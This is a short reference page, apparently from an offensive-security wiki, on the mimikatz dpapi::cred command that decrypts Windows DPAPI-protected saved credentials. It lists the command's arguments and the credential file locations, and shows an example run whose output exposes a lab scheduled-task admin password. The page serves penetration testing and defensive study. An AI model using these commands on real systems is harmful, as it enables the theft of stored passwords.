Comment on page
cred
dpapi::cred decrypts DPAPI saved credential such as RDP, Scheduled tasks, etc (cf. dumping DPAPI secrets). It has the following command line arguments:/in: the file path to decrypt. The file locations areC:\Users\<UserName>\AppData\Local\Microsoft\Credentials\<credential_blob>\andC:\Users\<UserName>\AppData\Roaming\Microsoft\Credentials\<credential_blob>\. Tools like Seatbelt come in handy for enumerating credential blob files' location/lsaiso: In Windows, the LSAISO process runs as an Isolated User Mode (IUM) process in a new security environment that is known as Virtual Secure Mode (VSM). It is used when Credentials Guard is in place/password: the password to decrypt the blob/unprotect: displays the decryption results on screen
The following example was taken from Benjamin's howto ~ scheduled tasks credentials guide, which displays the content of the credential file:
mimikatz # dpapi::cred /in:%systemroot%\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\AA10EB8126AA20883E9542812A0F904C
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {5d4e7e0d-d922-4783-8efc-9319b45b1c9a}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 00000046 - 70
szDescription : Données d’identification locales
[...]
Decrypting Credential:
* volatile cache: GUID:{5d4e7e0d-d922-4783-8efc-9319b45b1c9a};KeyHash:ba02ef86f26c683858d3df3dc961e37b0d47e574
**CREDENTIAL**
credFlags : 00000030 - 48
credSize : 000000fe - 254
credUnk0 : 00004004 - 16388
Type : 00000002 - 2 - domain_password
Flags : 00000000 - 0
LastWritten : 03/01/2017 21:31:30
unkFlagsOrSize : 00000018 - 24
Persist : 00000002 - 2 - local_machine
AttributeCount : 00000000 - 0
unk0 : 00000000 - 0
unk1 : 00000000 - 0
TargetName : Domain:batch=TaskScheduler:Task:{813565C4-C976-4E78-A1CA-8BDAE749E965}
UnkData : (null)
Comment : (null)
TargetAlias : (null)
UserName : LAB\\admin
CredentialBlob : waza1234/a
Attributes : 0
Last modified 1yr ago